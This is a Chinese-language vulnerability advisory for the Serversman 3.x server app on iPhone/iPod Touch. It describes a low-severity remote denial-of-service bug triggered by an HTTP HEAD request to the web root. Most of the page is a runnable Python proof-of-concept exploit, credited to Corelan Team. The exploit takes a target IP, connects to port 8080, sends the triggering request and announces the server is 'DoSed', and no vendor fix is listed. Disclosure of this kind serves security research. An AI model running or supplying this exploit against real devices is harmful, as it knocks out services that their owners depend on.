漏洞起因
设计错误
危险等级
低
影响系统
Serversman 3.x (iPhone/iPod Touch)
不受影响系统
危害
远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。
攻击所需条件
攻击者必须访问Serversman。
漏洞信息
Serversman是由日本FreeBit公司基于该公司的“Emotion Link”虚拟网络上开发的一个产品系列。其主要理念为“将所有的机器都改造为服务器”。
iPhone/iPod Touch系统上的Serversman处理HTTP请求存在错误,攻击者可以对服务程序进行拒绝服务攻击。
使用HTTP ‘HEAD’请求访问设备上默认WEB ROOT ‘/’可触发此漏洞。
测试方法
0x04 : Exploit/PoC
——————
#!/usr/bin/python
#
# Apple Iphone/Ipod – Serversman 3.1.5 HTTP Remote DoS exploit
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com
# Homepage: http://serversman.com/index_en.jsp
# Download: From the app store (use your itunes account)
# Tested on: Iphone 3G – firmware 3.1.2 (Darwin kernel)
# Greetz to: corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team
# Special Greetz to TecR0c!
print "|——————————————————————|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|————————————————-[ EIP Hunters ]–|"
print "[+] Apple Iphone/Ipod – Serversman 3.1.5 HTTP Remote DOS exploit"
import socket
import sys
def Usage():
print ("Usage: ./serversman.py <serv_ip>\n")
print ("Example: ./serversman.py 192.168.48.183\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
print "[+] Sending payload.. muhaha ph33r"
sock.send("HEAD / HTTP/1.0\r\n\r\n")
r=sock.recv(1024)
sock.close()
print "[+] HTTP Server is now DoSed!"
sys.exit(0);
厂商解决方案
目前没有解决方案提供:
http://serversman.com/
漏洞提供者
Steven Seeley (mr_me)
0 条评论。